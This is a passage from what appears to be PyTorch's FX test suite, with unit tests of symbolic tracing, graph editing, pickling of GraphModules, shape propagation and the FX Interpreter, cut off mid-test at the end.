self.assertIn('wrapped_via_decorator', retraced.code) self.assertEqual(retraced(0), 1) def test_graph_edit_with_proxy(self): class M(torch.nn.Module): def forward(self, a, b): return a + b m = M() g = symbolic_trace(m).graph new_g = torch.fx.Graph() val_map : Dict[Node, Node] = {} output_val = new_g.graph_copy(g, val_map) t = Proxy(output_val) # test that we can use proxy objects to generate more graph code later for things that do not need to work with modules. 
new_g.output((t + t).node) gm = GraphModule(m, new_g) gm.graph.lint() self.assertEqual(gm(3, 4), 14) def test_graph_unique_names(self): class M(torch.nn.Module): def forward(self, a, b): return a + b m = M() g = symbolic_trace(m).graph new_g = torch.fx.Graph() val_map : Dict[Node, Node] = {} output_val = new_g.graph_copy(g, val_map) t = Proxy(output_val) # test that we can use proxy objects to generate more graph code later for things that do not need to work with modules. new_g.output((t + t).node) gm = GraphModule(m, new_g) seen_names : Set[str] = set() for node in gm.graph.nodes: assert node.name not in seen_names seen_names.add(node.name) def test_stack_traces(self): class M(torch.nn.Module): def forward(self, a, b): return a + b tracer = torch.fx.Tracer() tracer.record_stack_traces = True graph = tracer.trace(M()) # saving the original list because we will insert new nodes as a part of a test orig_graph_nodes = list(graph.nodes) for node in orig_graph_nodes: if node.op == 'output': continue self.assertTrue(node.stack_trace is not None) assert 'test_fx.py' in node.stack_trace # verify that copying the node does not lose the stack trace new_node = graph.node_copy(node) self.assertTrue(new_node.stack_trace is not None) assert 'test_fx.py' in new_node.stack_trace def test_graph_unique_names_manual(self): graph : torch.fx.Graph = torch.fx.Graph() a : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1') c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1') d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c)) graph.output(d) graph2 = torch.fx.Graph() val_map : Dict[Node, Node] = {} graph2.graph_copy(graph, val_map) seen_names : Set[str] = set() for node in graph2.nodes: assert node.name not in seen_names seen_names.add(node.name) def test_unpack(self): class M(torch.nn.Module): def forward(self, a, b): c, d = a return c + d + 
b a = (torch.rand(1), torch.rand(1)) b = torch.rand(1) m = M() self.checkGraphModule(m, (a, b)) def test_native_callable(self): if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS: raise unittest.SkipTest("non-portable load_library call used in test") # This test exercises the case where we use FX to translate from Python # code to some native callable object # # For the purposes of testing, we use ElementwiseInterpreter defined # in test_custom_class.cpp. # # We test that we can # 1) Construct a native callable from FX IR # 2) Construct a drop-in replacement module that delegates to the # native callable rather than the original code # 3) Run both the original code and native callable wrapper with # equivalent results # 4) TorchScript compile the native callable wrapper and confirm # equivalent results with the reference # 5) TorchScript serialize and deserialize the native callable # and confirm equivalent results with the reference # We use this simple Module as a reference computation class MySimpleMod(torch.nn.Module): def forward(self, x): return 3.0 * x + x msm = MySimpleMod() # This is what a lowering pass might look like: a function that takes # a valid nn.Module, symbolically traces it, lowers the Module to some # representation, and wraps that representation up into another # nn.Module instance that handles dispatch to the compiled/lowered code. 
def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module: # ===== Stage 1: Symbolic trace the module ===== mod = symbolic_trace(orig_mod) # ===== Stage 2: Lower GraphModule representation to the C++ # interpreter's instruction format ====== instructions = [] constant_idx = 0 constants = {} fn_input_names = [] target_to_name = { operator.add : "add", operator.mul : "mul" } output_node : Optional[Node] = None # For each instruction, create a triple # (instruction_name : str, inputs : List[str], output : str) # to feed into the C++ interpreter for n in mod.graph.nodes: target, args, out_name = n.target, n.args, n.name assert len(n.kwargs) == 0, "kwargs currently not supported" if n.op == 'placeholder': # Placeholders specify function argument names. Save these # for later when we generate the wrapper GraphModule fn_input_names.append(target) elif n.op == 'call_function': assert target in target_to_name, "Unsupported call target " + target arg_names = [] for arg in args: if not isinstance(arg, Node): # Pull out constants. 
These constants will later be # fed to the interpreter C++ object via add_constant() arg_name = f'constant_{constant_idx}' constants[arg_name] = torch.tensor( [arg] if isinstance(arg, numbers.Number) else arg) arg_names.append(arg_name) constant_idx += 1 else: arg_names.append(arg.name) instructions.append((target_to_name[target], arg_names, out_name)) elif n.op == 'output': if output_node is not None: raise RuntimeError('Multiple output nodes!') output_node = n else: raise RuntimeError('Unsupported opcode ' + n.op) interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter() # Load constants for k, v in constants.items(): interpreter.add_constant(k, v) # Specify names for positional input arguments interpreter.set_input_names(fn_input_names) # Load instructions interpreter.set_instructions(instructions) # Specify name for single output assert isinstance(output_node.args[0], torch.fx.Node) interpreter.set_output_name(output_node.args[0].name) # ===== Stage 3: Create a wrapper GraphModule around the interpreter ===== class WrapperModule(torch.nn.Module): def __init__(self, interpreter): super().__init__() self.interpreter = interpreter wrapper = WrapperModule(interpreter) # Create a graph that: 1) Takes function arguments 2) Invokes the interpreter # 3) Returns the speficied return value # FIXME: The following code could be greatly simplified by symbolic_trace'ing # the wrapper with a Tracer that considers the Wrapper instance a root # module, however, I can't get `__call__` exposed on TorchBind classes # without it messing up Python `hasattr` for some reason. More digging # into CPython's implementation of hasattr is probably in order... 
graph = torch.fx.Graph() # Add placeholders for fn inputs placeholder_nodes = [] for name in fn_input_names: placeholder_nodes.append(graph.create_node('placeholder', name)) # Get the interpreter object interpreter_node = graph.create_node('get_attr', 'interpreter') # Add a node to call the interpreter instance output_node = graph.create_node( op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes)) # Register output graph.output(output_node) graph.lint() # Return final GraphModule!!! return GraphModule(wrapper, graph) # Lower GraphModule to C++ interpreter lowered = lower_to_elementwise_interpreter(msm) # Compare correctness with original module x = torch.rand(3, 4) ref_out = msm(x) test_out = lowered(x) torch.testing.assert_close(test_out, ref_out) # Test TorchScript compilation scripted_lowered = torch.jit.script(lowered) script_out = scripted_lowered(x) torch.testing.assert_close(script_out, ref_out) # Test TorchScript ser/de import_copy = self.getExportImportCopy(scripted_lowered) imported_out = import_copy(x) torch.testing.assert_close(imported_out, ref_out) def test_reserved_getattr(self): """Ensure that we do not name any nodes with a reserved builtin like `getattr`""" class M(torch.nn.Module): def forward(self, a): return a.foo.bar.baz m = M() m_g = symbolic_trace(m) m_g.graph.lint() for node in m_g.graph.nodes: self.assertTrue(node.name != "getattr") def test_node_tagging(self): class TaggingTracer(Tracer): def create_node(self, kind : str, target : Union[str, Callable], args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None, type_expr : Optional[Any] = None) -> Node: n = super().create_node(kind, target, args, kwargs, name) n.tag = 'foo' return n class M(torch.nn.Module): def forward(self, a, b): return a + b m = M() g = TaggingTracer().trace(m) g.lint() for n in g.nodes: self.assertTrue(hasattr(n, 'tag')) self.assertEqual(n.tag, 'foo') def test_tensor_attribute(self): class 
TensorAttribute(torch.nn.Module): def __init__(self): super().__init__() self.tensor = torch.rand(3, 4) def forward(self, x): return torch.nn.functional.linear(x, self.tensor) ta = TensorAttribute() traced = symbolic_trace(ta) traced(torch.rand(4, 4)) class WrapperForQualname(torch.nn.Module): def __init__(self): super().__init__() self.ta = TensorAttribute() def forward(self, x): return torch.nn.functional.linear(x, self.ta.tensor) wfq = WrapperForQualname() traced2 = symbolic_trace(wfq) traced2.graph.lint() traced2(torch.rand(4, 4)) def test_tensor_attribute_coalseced(self): def count_attrs(fx_module): targets = set() for node in traced.graph.nodes: if node.op == 'get_attr': targets.add(node.target) return len(targets) val = torch.tensor(5) def f(x): return x + val + val traced = symbolic_trace(f) traced.graph.lint() self.assertEqual(count_attrs(traced), 1) val2 = torch.tensor(5) def f(x): val = torch.tensor(5) return x + val + val2 traced = symbolic_trace(f) traced.graph.lint() self.assertEqual(count_attrs(traced), 2) def test_symbolic_trace_sequential(self): class Simple(torch.nn.Module): def forward(self, x): return torch.neg(x) seq = torch.nn.Sequential( Simple(), Simple(), Simple() ) traced = symbolic_trace(seq) traced.graph.lint() x = torch.rand(3, 4) self.assertEqual(traced(x), seq(x)) def test_tensor_constant(self): class ConstTensor(torch.nn.Module): def forward(self, x): return torch.nn.functional.linear(x, torch.zeros(3, 4)) ct = ConstTensor() traced = symbolic_trace(ct) traced.graph.lint() traced(torch.rand(4, 4)) def test_pickle_graphmodule(self): class Nested(torch.nn.Module): def __init__(self): super().__init__() self.st = torch.nn.Linear(4, 4) def forward(self, x): return self.st(x) n = Nested() traced = symbolic_trace(n) traced.graph.lint() pickled = pickle.dumps(traced) loaded = pickle.loads(pickled) loaded.graph.lint() x = torch.rand(3, 4) self.assertEqual(loaded(x), traced(x)) def test_pickle_custom_import(self): graph = torch.fx.Graph() a = 
graph.placeholder('x') b = graph.placeholder('y') c = graph.call_function(a_non_torch_leaf, (a, b)) d = graph.call_function(torch.sin, (c,)) graph.output(d) gm = GraphModule(torch.nn.Module(), graph) pickled = pickle.dumps(gm) loaded = pickle.loads(pickled) loaded.graph.lint() x, y = torch.rand(1), torch.rand(1) self.assertEqual(loaded(x, y), gm(x, y)) def test_all_input_nodes(self): graph : torch.fx.Graph = torch.fx.Graph() a : torch.fx.Node = graph.placeholder('x') b : torch.fx.Node = graph.call_module('linear_mod', args=(a,)) c : torch.fx.Node = graph.get_attr('y_attr') d : torch.fx.Node = graph.call_function(operator.add, args=(b, c)) e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0)) graph.output(e) graph.lint() self.assertEqual(b.all_input_nodes, [a]) self.assertEqual(c.all_input_nodes, []) self.assertEqual(d.all_input_nodes, [b, c]) self.assertEqual(e.all_input_nodes, [d]) def test_deepcopy_graphmodule_with_transform(self): st = SimpleTest() traced = symbolic_trace(st) traced.graph.lint() def transform(traced): new_graph = torch.fx.Graph() val_map : Dict[Node, Node] = {} output_value = new_graph.graph_copy(traced.graph, val_map) relu_out = new_graph.create_node( op='call_method', target='neg', args=(output_value,), kwargs={}) new_graph.output(relu_out) return GraphModule(traced, new_graph) transformed = transform(traced) transformed.graph.lint() copied = copy.deepcopy(transformed) self.assertNotEqual(id(type(transformed)), id(type(copied))) x = torch.randn(3, 4) self.assertEqual(copied(x), transformed(x)) def test_deepcopy_with_submods_params(self): class Bar(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) def forward(self, x): return torch.relu(x) + self.param class Baz(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.bar = Bar() def forward(self, x): return self.bar(x) - self.param baz = Baz() traced = 
symbolic_trace(baz) traced.graph.lint() copied = copy.deepcopy(traced) copied.graph.lint() def test_deepcopy_graph_with_tracer_cls(self): class TestTracer(Tracer): def is_leaf_module(self, module, name): return True g = Graph(tracer_cls=TestTracer) x = g.placeholder("x") g.output(x) h = copy.deepcopy(g) self.assertIsNotNone(h._tracer_cls) self.assertTrue(g._tracer_cls == h._tracer_cls) def test_unpack_list_better_error(self): class SomeArgs(torch.nn.Module): def forward(self, a, b): return torch.rand(3, 4) class UnpacksList(torch.nn.Module): def __init__(self): super().__init__() self.sa = SomeArgs() def forward(self, x : list): return self.sa(*x) ul = UnpacksList() with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'): symbolic_trace(ul) def test_unpack_dict_better_error(self): class SomeKwargs(torch.nn.Module): def forward(self, x=3, y=4): return torch.rand(3, 4) class UnpacksDict(torch.nn.Module): def __init__(self): super().__init__() self.sk = SomeKwargs() def forward(self, x : dict): return self.sk(**x) ud = UnpacksDict() with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'): symbolic_trace(ud) def test_pretty_print_targets(self): # Test that Graph pretty-print prints friendly name for targets # in `operator` and `builtins` class SomeMod(torch.nn.Module): def forward(self, x): return torch.add(x.foo + x.bar, 3.0) traced = symbolic_trace(SomeMod()) graph_str = str(traced.graph) self.assertIn('builtins.getattr', graph_str) self.assertIn('operator.add', graph_str) self.assertIn('torch.add', graph_str) def test_pretty_print_node(self): class M(torch.nn.Module): def __init__(self): super().__init__() self.param: torch.nn.Parameter = torch.nn.Parameter( torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x: torch.Tensor, y: int = 2): return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0) traced = symbolic_trace(M()) all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes]) 
FileCheck().check("x").check("placeholder") \ .check("y").check("placeholder") \ .check("getitem").check("call_function") \ .check("param").check("get_attr") \ .check("add").check("call_function") \ .check("linear").check("call_module") \ .check("clamp").check("call_method") \ .run(all_formatted) def test_script_tensor_constant(self): # TorchScript seems to ignore attributes that start with `__`. # We used to call anonymous Tensor values `__tensor_constant*`, but # they were getting ignored by script. Now they're called # `_tensor_constant*` class IHaveATensorConstant(torch.nn.Module): def forward(self, x): return x + torch.rand(3, 4) traced = torch.fx.symbolic_trace(IHaveATensorConstant()) torch.jit.script(traced) def test_autowrap_functions(self): class AutowrapFnTest(torch.nn.Module): def forward(self, x): return fx_int(x.shape[0] / 2) class AutowrapFnTest2(torch.nn.Module): def forward(self, x): return fx_int(x.shape[0] / 2) + fx_int_x2(x.shape[0] / 2) # Check function(s) are wrapped # `int` would normally throw a TypeError as argument can't be `Proxy` tracer = Tracer(autowrap_functions=(fx_int,)) graph = tracer.trace(AutowrapFnTest()) traced = GraphModule(tracer.root, graph, 'test') tracer_2 = Tracer(autowrap_functions=(fx_int, fx_int_x2)) tracer_2.trace(AutowrapFnTest2()) # Test scriptability traced_scripted = torch.jit.script(traced) self.assertEqual(traced_scripted(torch.rand(4)), 2) def test_torch_fx_len(self): class FXLenTest(torch.nn.Module): def forward(self, x): return len(x) traced = symbolic_trace(FXLenTest()) self.assertEqual(traced(torch.rand(3, 4)), 3) # Test scriptability scripted = torch.jit.script(FXLenTest()) self.assertEqual(scripted(torch.rand(3)), 3) traced_scripted = torch.jit.script(traced) self.assertEqual(traced_scripted(torch.rand(3)), 3) # Test non-proxy len class FXLenTest2(torch.nn.Module): def __init__(self): super().__init__() self.l = [3, 4, 5] def forward(self, x): return x + len(self.l) traced2 = symbolic_trace(FXLenTest2()) 
inp = torch.rand(3, 4) self.assertEqual(traced2(inp), inp + 3.0) self.assertIs(len, builtins.len) def test_torch_fx_getattr(self): class FXGetattrTest(torch.nn.Module): def forward(self, x): return getattr(x, 'nonexistent_attr', torch.Tensor([2, 3])) traced = symbolic_trace(FXGetattrTest()) self.assertEqual(traced(torch.rand(3, 4)), torch.Tensor([2, 3])) def test_sqrt(self): class Sqrt1(torch.nn.Module): def forward(self, x): return sqrt(x.size(0)) class Sqrt2(torch.nn.Module): def forward(self, x): return math.sqrt(x.size(0)) class Sqrt3(torch.nn.Module): def forward(self, x): return x + math.sqrt(2) + sqrt(2) self.checkGraphModule(Sqrt1(), [torch.zeros(8)]) self.checkGraphModule(Sqrt2(), [torch.zeros(8)]) self.checkGraphModule(Sqrt3(), [torch.zeros(8)]) self.assertIs(sqrt, _sqrt) self.assertIs(math.sqrt, _sqrt) def test_torch_custom_ops(self): class M(torch.nn.Module): def forward(self, a): b = torch.ops.aten.sigmoid(a) c = torch.ops.aten.cat([a, b]) return torch.ops.aten.cat((c, c)) m = M() input = torch.randn(3) ref_out = m(input) gm = symbolic_trace(m) gm.graph.lint() out = gm(input) self.assertEqual(out, ref_out) def test_pickle_torch_custom_ops(self): class M(torch.nn.Module): def forward(self, a): b = torch.ops.aten.sigmoid(a) c = torch.ops.aten.cat([a, b]) return torch.ops.aten.cat((c, c)) m = M() input = torch.randn(3) ref_out = m(input) gm = symbolic_trace(m) gm.graph.lint() pickled = pickle.dumps(gm) loaded = pickle.loads(pickled) self.assertEqual(loaded(input), gm(input)) def test_pretty_print(self): st = SimpleTest() traced = symbolic_trace(st) traced.graph.lint() printed = str(traced) assert 'SimpleTest()' in printed assert 'torch.relu' in printed def test_pretty_print_graph(self): class KwargPrintTest(torch.nn.Module): def forward(self, x): return torch.squeeze(x + 3.0, dim=2) st = KwargPrintTest() traced = symbolic_trace(st) traced.graph.lint() stringed = str(traced.graph) for s in ['args', 'kwargs', '#users']: assert s in stringed def 
test_custom_proxy_type(self): class TensorPair: def __init__(self, left, right): self.left, self.right = left, right def add(self, other): l = self.left + other.left r = self.right + other.right return TensorPair(l, r) def mul(self, other): l = self.left * other.left r = self.right * other.right return TensorPair(l, r) def use_tensor_pair(x : TensorPair, y : TensorPair): s = x.add(y) return s.mul(x) x = TensorPair(torch.randn(5, 3), torch.randn(5, 3)) y = TensorPair(torch.randn(5, 3), torch.randn(5, 3)) ref_out = use_tensor_pair(x, y) traced = symbolic_trace(use_tensor_pair) traced_out = traced(x, y) self.assertEqual(traced_out.left, ref_out.left) self.assertEqual(traced_out.right, ref_out.right) def test_custom_proxy_type_literal(self): class TensorPair(metaclass=torch.fx.ProxyableClassMeta): def __init__(self, left, right): self.left, self.right = left, right def add(self, other): l = self.left + other.left r = self.right + other.right return TensorPair(l, r) def mul(self, other): l = self.left * other.left r = self.right * other.right return TensorPair(l, r) def use_tensor_pair_literal(x : TensorPair): s = x.add(TensorPair(torch.zeros(5, 3), torch.zeros(5, 3))) return s.mul(x) x = TensorPair(torch.randn(5, 3), torch.randn(5, 3)) ref_out = use_tensor_pair_literal(x) traced = symbolic_trace(use_tensor_pair_literal) traced_out = traced(x) self.assertEqual(traced_out.left, ref_out.left) self.assertEqual(traced_out.right, ref_out.right) def test_custom_proxy_dynamic_value(self): class TensorPair(metaclass=torch.fx.ProxyableClassMeta): def __init__(self, left, right): self.left, self.right = left, right def add(self, other): l = self.left + other.left r = self.right + other.right return TensorPair(l, r) def mul(self, other): l = self.left * other.left r = self.right * other.right return TensorPair(l, r) def use_tensor_pair_ctor(x : TensorPair, y : torch.Tensor): s = x.add(TensorPair(y, y)) return s.mul(x) x = TensorPair(torch.randn(5, 3), torch.randn(5, 3)) y = 
torch.randn(5, 3) ref_out = use_tensor_pair_ctor(x, y) traced = symbolic_trace(use_tensor_pair_ctor) traced_out = traced(x, y) self.assertEqual(traced_out.left, ref_out.left) self.assertEqual(traced_out.right, ref_out.right) def test_custom_proxy_input_dependent_control_flow(self): class ZeroTensor(metaclass=torch.fx.ProxyableClassMeta): def __init__(self, inp): if inp.sum() == 0: self.is_zero = True self.tensor = torch.tensor([]) else: self.is_zero = False self.tensor = inp def add(self, other): if self.is_zero: return ZeroTensor(other.tensor) elif other.is_zero: return self def use_zero_tensor(x : torch.Tensor, y : torch.Tensor): return ZeroTensor(x + y) x, y = torch.randn(5, 3), torch.randn(5, 3) ref_out = use_zero_tensor(x, y) traced = symbolic_trace(use_zero_tensor) traced_out = traced(x, y) self.assertEqual(traced_out.is_zero, ref_out.is_zero) self.assertEqual(traced_out.tensor, ref_out.tensor) def test_graph_fns(self): g = Graph() a = g.placeholder('a') b = g.call_module('linear', (a,)) c = g.get_attr('bias') d = g.call_method('add', (b, c)) e = g.call_function(torch.sin, (d,)) g.output(e) mod = torch.nn.Module() mod.linear = torch.nn.Linear(3, 4) mod.bias = torch.rand(4) gm = GraphModule(mod, g) gm.graph.lint() input = torch.rand(3) r = gm(input) ref = torch.sin(mod.linear(input) + mod.bias) self.assertEqual(r, ref) def test_remove_uses(self): g : torch.fx.Graph = Graph() x : torch.fx.Node = g.placeholder('x') relu : torch.fx.Node = g.call_function(torch.relu, (x,)) neg : torch.fx.Node = g.call_function(torch.neg, (relu,)) g.output(neg) neg.replace_all_uses_with(relu) g.erase_node(neg) self.assertTrue(neg not in relu.users) def test_nonetype_annotation(self): eb = torch.nn.EmbeddingBag(3, 4) symbolic_trace(eb) def test_pickle_nonetype_annotation(self): eb = torch.nn.EmbeddingBag(10, 3, mode='sum') traced = symbolic_trace(eb) pickled = pickle.dumps(traced) loaded = pickle.loads(pickled) loaded.graph.lint() input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9]) 
offsets = torch.LongTensor([0, 4]) self.assertEqual(loaded(input, offsets), traced(input, offsets)) def test_return_tuple(self): class M(torch.nn.Module): def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]: return (x, x + x) original = M() traced = symbolic_trace(original) self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1))) def test_construct_root_dict(self): graph : torch.fx.Graph = torch.fx.Graph() a : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,)) c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam') d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c)) graph.output(d) linear_mod : torch.nn.Module = torch.nn.Linear(3, 4) add_param : torch.Tensor = torch.rand(3, 4) gm : torch.fx.GraphModule = torch.fx.GraphModule( {'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph) gm.graph.lint() assert 'self.foo.bar.baz' in gm.code x : torch.Tensor = torch.rand(3, 3) out : torch.Tensor = gm(x) ref_out : torch.Tensor = linear_mod(x) + add_param self.assertEqual(out, ref_out) def test_symbolic_trace_assert(self): class AssertsTensorShape(torch.nn.Module): def forward(self, x): torch._assert(x.shape[1] > 4, "assert_foobar") return x m = AssertsTensorShape() # verify traceability traced = symbolic_trace(m) # verify assertion on traced model works correctly at runtime traced(torch.rand(4, 5)) with self.assertRaisesRegex(AssertionError, "assert_foobar"): traced(torch.rand(4, 3)) # verify the symbolically traced module is scriptable ms = torch.jit.script(m) with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"): ms(torch.rand(4, 3)) def test_fx_create_arg(self): class CustomArgObject: def __init__(self, x, y): self.x = x self.y = y def __fx_create_arg__(self, tracer: torch.fx.Tracer): return tracer.create_node( "call_function", CustomArgObject, args=( tracer.create_arg(self.x), 
tracer.create_arg(self.y), ), kwargs={}, ) class HasCustomArgObjectWhenLeaf(torch.nn.Module): def forward(self, o: CustomArgObject): # Not normally traceable; good reason to make # this module a leaf. for x in o.x: o.y += x return o.y class Root(torch.nn.Module): def __init__(self): super().__init__() self.inner = HasCustomArgObjectWhenLeaf() def forward(self, x, y): o = CustomArgObject(x, y) return self.inner(o) class CreateArgTracer(torch.fx.Tracer): def is_leaf_module(self, m, module_qualified_name): return type(m) is HasCustomArgObjectWhenLeaf m = Root() graph = CreateArgTracer().trace(m) gm = torch.fx.GraphModule(m, graph) assert "CustomArgObject(" in gm.code def test_trace_fn_constant(self): some_constant = torch.rand(3, 4) def add_const(x): return some_constant + x traced = symbolic_trace(add_const) input = torch.rand(3, 4) self.assertEqual(traced(input), add_const(input)) def test_copy_no_remap(self): traced = symbolic_trace(SimpleTest()) g = traced.graph copied = torch.fx.Graph() for node in g.nodes: copied.node_copy(node) with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'): copied.lint() def test_wrong_topo(self): graph : torch.fx.Graph = torch.fx.Graph() a : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,)) c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam') d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c)) graph.output(d) nodes = list(graph.nodes) nodes[3].append(nodes[2]) with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'): graph.lint() def test_wrong_target_type(self): graph : torch.fx.Graph = torch.fx.Graph() with self.assertRaises(ValueError): n = torch.fx.Node(graph=graph, name='foo', op='call_function', target='foo', args=(), kwargs={}) def test_example_shape_prop(self): class TestCase(torch.nn.Module): def __init__(self): super().__init__() self.attr = torch.randn(3, 4) 
self.submod = torch.nn.Linear(4, 4) def forward(self, x): return torch.neg(self.submod(x.relu() + self.attr)) tc = TestCase() tc_traced = symbolic_trace(tc) ref_out = tc_traced(torch.rand(3, 4)) shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4)) # Make sure we're testing all opcodes opcodes = set() output_shape : Optional[torch.Shape] = None output_stride : Optional[Tuple[int]] = None for node in tc_traced.graph.nodes: opcodes.add(node.op) if node.op == 'output': output_shape = node.args[0].meta['tensor_meta'].shape output_stride = node.args[0].meta['tensor_meta'].stride self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method', 'call_module', 'output'])) # Test shape propogation and make sure results match actual self.assertEqual(output_shape, ref_out.shape) self.assertEqual(output_stride, ref_out.stride()) def test_shape_prop_layout(self): class ConvTest(torch.nn.Module): def __init__(self): super().__init__() self.conv_mod = torch.nn.Conv2d(5, 5, 3) def forward(self, x): return self.conv_mod(x) # contiguous layout test_mod = ConvTest() traced = symbolic_trace(test_mod) x = torch.randn(5, 5, 224, 224) shape_prop.ShapeProp(traced).propagate(x) assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format for node in traced.graph.nodes)) x_channels_last = x.contiguous(memory_format=torch.channels_last) traced.to(memory_format=torch.channels_last) shape_prop.ShapeProp(traced).propagate(x_channels_last) for node in traced.graph.nodes: # NB: the implementation of conv may not preserve the memory format, # unfortunately. 
The best we can do is just check that the placeholder # node is channels-last if node.op in {'placeholder'}: self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last) def test_shape_prop_aggregate(self): class ReturnTwo(torch.nn.Module): def forward(self, x): return (3, torch.sum(x)) class UnderTest(torch.nn.Module): def __init__(self): super().__init__() self.rt = ReturnTwo() def forward(self, x): return self.rt(x) ut = UnderTest() class RTTracer(torch.fx.Tracer): def is_leaf_module(self, m, module_qualified_name): return type(m) is ReturnTwo graph = RTTracer().trace(ut) mod = torch.fx.GraphModule(ut, graph) shape_prop.ShapeProp(mod).propagate(torch.rand(3, 4)) for node in mod.graph.nodes: if node.op == 'call_module': assert 'tensor_meta' in node.meta tensor_meta = node.meta['tensor_meta'] assert tensor_meta[0] == 3 assert tensor_meta[1].shape == torch.Size([]) def test_shape_prop_layout_3d(self): class ConvTest3d(torch.nn.Module): def __init__(self): super().__init__() self.conv_mod = torch.nn.Conv3d(5, 5, 3) def forward(self, x): return self.conv_mod(x) test_mod_3d = ConvTest3d() traced_3d = symbolic_trace(test_mod_3d) x_3d = torch.randn(5, 5, 224, 224, 15) shape_prop.ShapeProp(traced_3d).propagate(x_3d) assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format for node in traced_3d.graph.nodes)) x_channels_last_3d = x_3d.contiguous(memory_format=torch.channels_last_3d) traced_3d.to(memory_format=torch.channels_last_3d) shape_prop.ShapeProp(traced_3d).propagate(x_channels_last_3d) for node in traced_3d.graph.nodes: # NB: the implementation of conv may not preserve the memory format, # unfortunately. 
The best we can do is just check that the placeholder # node is channels-last if node.op in {'placeholder'}: self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last_3d) def test_interpreter(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): return self.linear(x + self.param).clamp(min=0.0, max=1.0) m = MyModule() gm = torch.fx.symbolic_trace(m) interpreter = Interpreter(gm) input = torch.randn(3, 4) self.assertEqual(interpreter.run(input), gm(input)) self.assertEqual(interpreter.run(input), m(input)) def test_interpreter_run_node_override(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): return self.linear(x + self.param).clamp(min=0.0, max=1.0) m = MyModule() gm = torch.fx.symbolic_trace(m) class RunNodeInterpreter(Interpreter): def __init__(self, module): super().__init__(module) def run_node(self, n : Node) -> Any: result = super().run_node(n) n.cached_value = result return result input = torch.randn(3, 4) RunNodeInterpreter(gm).run(input) for node in gm.graph.nodes: assert hasattr(node, 'cached_value') def test_interpreter_onthefly_swap(self): def fn(x): return torch.sigmoid(x).neg() gm = torch.fx.symbolic_trace(fn) class NegSigmSwapInterpreter(Interpreter): def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any: if target == torch.sigmoid: return torch.neg(*args, **kwargs) return super().call_function(n) def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any: if target == 'neg': call_self, *args_tail = args return call_self.sigmoid(*args_tail, **kwargs) return super().call_method(n) input = torch.randn(3, 4) result = NegSigmSwapInterpreter(gm).run(input) self.assertEqual(result, torch.neg(input).sigmoid()) def 
test_interpreter_partial_eval(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): return self.linear(x + self.param).clamp(min=0.0, max=1.0) gm = torch.fx.symbolic_trace(MyModule()) interp = Interpreter(gm) env = {} for node in gm.graph.nodes: if node.op == 'call_module' and node.target == 'linear': env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0 break assert len(env) == 1 x = torch.randn(3, 4) result = interp.run(x, initial_env=env) self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0)) def test_interpreter_star_args(self): def with_star_args(x, *args): return x + args[0] gm = torch.fx.symbolic_trace(with_star_args) interp = Interpreter(gm) result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4)) self.assertEqual(result, torch.ones(3, 4) * 2.0) @skipIfNoTorchVision def test_interpreter_noop_resnet18(self): rn18 = torchvision_models.resnet18() transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform() inp = torch.randn(5, 3, 224, 224) self.assertEqual(transformed(inp), rn18(inp)) @skipIfNoTorchVision def test_interpreter_gc_values(self): rn18 = torchvision_models.resnet18() interp = Interpreter(symbolic_trace(rn18)) inp = torch.rand(5, 3, 224, 224) out = interp.run(inp) env_key_names = set(n.name for n in interp.env.keys()) self.assertEqual(env_key_names, set(['output'])) def test_transformer_noop(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 